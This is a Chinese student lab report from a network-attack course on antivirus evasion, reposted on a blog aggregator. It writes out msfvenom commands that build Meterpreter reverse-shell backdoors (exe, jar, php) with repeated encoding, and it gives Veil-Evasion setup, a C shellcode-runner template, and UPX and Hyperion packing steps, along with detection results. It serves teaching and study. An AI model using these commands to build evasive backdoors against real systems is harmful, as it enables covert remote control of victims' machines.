2018-2019-2 網絡對抗技術 20165334 Exp3 免殺原理與實踐
阿新 • • 發佈:2019-03-29
語言 保護 r文件 原理 添加 ima port 復制 png
2018-2019-2 網絡對抗技術 20165334 Exp3 免殺原理與實踐
一、實驗內容
任務一正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,利用shellcode編程等免殺工具或技巧
1、使用msf編碼器,生成exe文件
- 使用exp2中生產的後門程序
20165334_backdoor.exe利用VirusTotal網站進行掃描檢測。
20165334_backdoor.exe利用Virscan網站進行掃描檢測。
-使msf編碼器對後門程序進行多次的編碼,並檢測。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b ‘\x00’ LHOST=192.168.56.102 LPORT=5334 -f exe > met-lt5334l.exe
用使用virscan進行掃描,結果如下所示
- msfvenom生成jar文件
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=5334 x> ltl_backdoor_java.jar - 用使用virscan進行掃描,結果如下所示
- msfvenom生成php文件
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=5334 x> 20155334_backdoor.php 用使用virscan進行掃描,結果如下所示
2、使用veil-evasion生成後門程序及檢測
- 用
sudo apt-get install veil命令安裝Veil,若遇到問題則用sudo apt-get upgrade這兩個命令更新一下軟件包即可之後用veil打開veil,輸入y繼續安裝直至完成。
-設置反彈連接IPset LHOST 192.168.56.102(IP是KaliIP) - 設置端口
set LPORT 5334
- 輸入
generate生成文件,接著輸入你想要playload的名字:baddoor5334
掃描檢測
3、半手工註入Shellcode並執行
- 使用命令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.102LPORT=5334 -f c用c語言生成一段shellcode
-利用上面生成的數組拿來編寫一個程序,結構如下
unsigned char buf[] =
"此處復制粘貼之前用msf生成的buf"
int main()
{
int (*func)() = (int(*)())buf;
func();
}- 使用命令
i686-w64-mingw32-g++ shell5334.c -o shell5334.exe編譯
- 掃描檢測
-x嘗試運行結果被360攔截了。
以上嘗試可以看出沒有處理的後門程序基本上都可以檢測出來。
加殼
- 壓縮殼 :減少應用體積,如ASPack,UPX
加密殼: 版權保護,反跟蹤。如ASProtect,Armadillo
虛擬機 :通過類似編譯手段,將應用指令轉換為自己設計的指令集。如VMProtect,Themida
1、使用壓縮殼(UPX)
還是沒能幸免,立刻被殺軟截殺
在360中添加信任後測試其可用性。
2、加密殼Hyperion
- 將上一個生成的文件拷貝到
/usr/share/windows-binaries/hyperion/目錄中 - 進入目錄
/usr/share/windows-binaries/hyperion/中 - 輸入命令
wine hyperion.exe -v sxx_upxed.exe sxx_upxed_Hyperion.exe進行加殼 
反彈連接
檢測結果
2018-2019-2 網絡對抗技術 20165334 Exp3 免殺原理與實踐